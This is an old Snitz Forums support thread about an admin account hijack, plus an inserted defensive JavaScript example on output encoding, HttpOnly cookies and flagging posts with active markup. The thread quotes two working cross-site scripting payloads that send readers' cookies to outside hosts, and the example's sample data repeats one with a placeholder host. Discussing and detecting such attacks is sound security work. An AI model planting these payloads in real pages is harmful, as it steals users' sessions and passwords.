Snitz Forums 2000
 Help !!! Urgent !!!

DHT
Starting Member

37 Posts

Posted - 07 July 2001 : 05:10:18
Today, my forum was hacked. The hacker somehow gained access with the admin account (my admin password is up to 10 characters!). He deleted entire forums.

After I replaced the database with the backup file, he got access again and left this hidden code in his message:


...
img src=""http://www.laptrinh.f2s.com""onerror=""this.src=src+'/test.pl?test='+escape(document.cookie);"" border=0
...

I guess that test.pl can catch the cookies of users who read his message. Can he do it? The Snitz program adds the password into the cookie, so can this hacker obtain the password this way?

If it is true, what should the solution be?

Urgent, please!

simonduz
Junior Member

161 Posts

Posted - 07 July 2001 : 09:33:03
Where is your DB located, and what is the security on that location?
I used to have those problems (not as severe though) till I moved my DB outside of the www root.
This will be interesting to follow. Security is a big issue with IIS.
Simonduz

http://easyromantic.webbhost.net -[test site]-
yada, yada.

DHT
Starting Member

37 Posts

Posted - 07 July 2001 : 12:46:19
I have the database on a different drive! Since that hacker obtained the admin password, he can do anything in the forum. Here is another piece of hidden code that I found in my forum:

...
script language="JavaScript">var s1="htt"+"p://blake.prohosting.com/newaus/cgi-bin/image.cgi?VietBao=";var st=document.cookie;document.write("<img border=0 width=0 height=0 src=\"",s1,st,"\">");</script
...

It is the same thing: this guy tries to catch the cookies of other users! At this time, my temporary solution is to replace (or remove) the string "document.cookie" in the post or reply message in post.asp (search for T_Message or R_Message).

Any opinion from Snitz's developers, please?


Edited by - DHT on 07 July 2001 12:47:49
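Added example, not part of the thread and not Snitz's own code: both hidden snippets quoted above depend on the forum rendering message markup as HTML and on the login cookie being readable from script. This JavaScript sketch encodes messages at output, issues an HttpOnly session token in place of a password cookie, and flags stored posts that carry active markup; the function names, the sample posts and the attacker.example host are constructed for illustration.

```javascript
// Added example (not forum code). All names below are hypothetical.
// Sample posts are constructed; attacker.example is a placeholder host.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a stored message at render time so any markup in it is shown as text
// instead of being interpreted by the reader's browser.
function encodeForHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build a Set-Cookie value that carries an opaque, server-generated session
// token, never the password. HttpOnly keeps it out of document.cookie.
function sessionCookie(name, token) {
  if (!/^[A-Za-z0-9_-]{16,}$/.test(token)) {
    throw new Error('token must be an opaque random id');
  }
  return `${name}=${token}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Incident cleanup helper: return ids of stored posts containing script tags,
// inline event handlers or javascript: URLs. Heuristic, for review by a human.
const ACTIVE_MARKUP = /<\s*script\b|\bon[a-z]+\s*=|javascript:/i;
function auditPosts(posts) {
  return posts.filter((p) => ACTIVE_MARKUP.test(p.message)).map((p) => p.id);
}

// Constructed sample data modelled on the two snippets quoted in the thread.
const samplePosts = [
  { id: 1, message: 'Where is your DB located?' },
  { id: 2, message: `<img src="http://attacker.example" onerror="this.src=src+'/test.pl?test='+escape(document.cookie);" border=0>` },
  { id: 3, message: '<script language="JavaScript">var st=document.cookie;</script>' },
];

console.log('posts to review:', auditPosts(samplePosts));
console.log('rendered safely:', encodeForHtml(samplePosts[2].message));
```

Encoding at output does not depend on recognising any particular string in the message, and the HttpOnly token limits what a missed case can read from the cookie.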

Aznknight
Senior Member

USA
1373 Posts

Posted - 07 July 2001 : 14:54:01
this is pretty serious. my forums were hacked too by someone somehow obtaining the pw to one of the admin accounts.

i don't know the solution to this either.

- Alan
www.iamviet.com
www.calvsa.net
Snitz Resource

work mule
Senior Member

USA
1358 Posts

Posted - 10 July 2001 : 00:32:34
Here's your answer:
http://forum.snitz.com/forum/link.asp?TOPIC_ID=12707



The Work Mule Forums
The Writer Community
Snitz Forums 2000 © 2000-2021 Snitz™ Communications
Powered By: Snitz Forums 2000 Version 3.4.07